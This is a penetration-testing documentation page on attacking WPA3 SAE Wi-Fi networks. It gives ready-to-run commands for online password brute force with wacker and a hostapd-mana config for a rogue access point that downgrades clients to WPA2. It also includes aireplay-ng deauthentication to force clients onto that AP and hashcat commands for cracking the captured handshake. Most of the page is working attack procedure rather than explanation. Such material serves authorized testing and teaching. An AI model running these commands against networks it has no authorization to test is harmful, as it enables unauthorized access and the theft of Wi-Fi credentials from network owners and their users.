> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WPA3 SAE

> Attacking WPA3 SAE networks: online brute force with wacker and downgrade attacks against mixed WPA2/WPA3 configurations.

## Overview

WPA3 introduces SAE (Simultaneous Authentication of Equals), replacing the PSK handshake with a protocol resistant to offline dictionary attacks. However, WPA3 networks can still be attacked through online brute force or by exploiting clients configured to accept both WPA2 and WPA3.

***

## Online Brute Force (wacker)

WPA3 does not expose a crackable handshake, but online brute force is still possible, each attempt connects to the AP and tests a password directly. Slow but viable against weak passwords.

```bash theme={"dark"}
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt \
  --ssid <SSID> \
  --bssid <BSSID> \
  --interface wlan1 \
  --freq <FREQUENCY>
```

***

## WPA3 → WPA2 Downgrade Attack

If the target AP supports both SAE and PSK (mixed mode), and clients are configured to accept WPA2, a rogue AP running WPA2 can capture the WPA2 handshake for offline cracking.

Check the airodump-ng `.csv` for `WPA2+SAE` or `PSK+SAE` in the encryption column, this indicates a mixed-mode AP.

`hostapd-mana` config to impersonate the AP with WPA2-only:

```
interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=handshake.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
```

```bash theme={"dark"}
hostapd-mana hostapd-downgrade.conf
```

Check if the AP has MFP (802.11w) enabled, if not, deauthenticate the client to force reconnection to the rogue AP:

```bash theme={"dark"}
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng wlan0mon -0 0 -a <REAL-BSSID> -c <CLIENT-MAC>
```

Once the handshake is captured, crack it:

```bash theme={"dark"}
hashcat -a 0 -m 22000 handshake.22000 ~/rockyou.txt --force
```

Convert hccapx to 22000 first if needed:

```bash theme={"dark"}
hcxhash2cap --hccapx=handshake.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o handshake.22000
```

***

## Note on MFP (802.11w)

WPA3 mandates Management Frame Protection (MFP), which prevents deauthentication attacks. Check in Wireshark, if `RSN Capabilities: MFP required` is set, deauth will not work against that client.
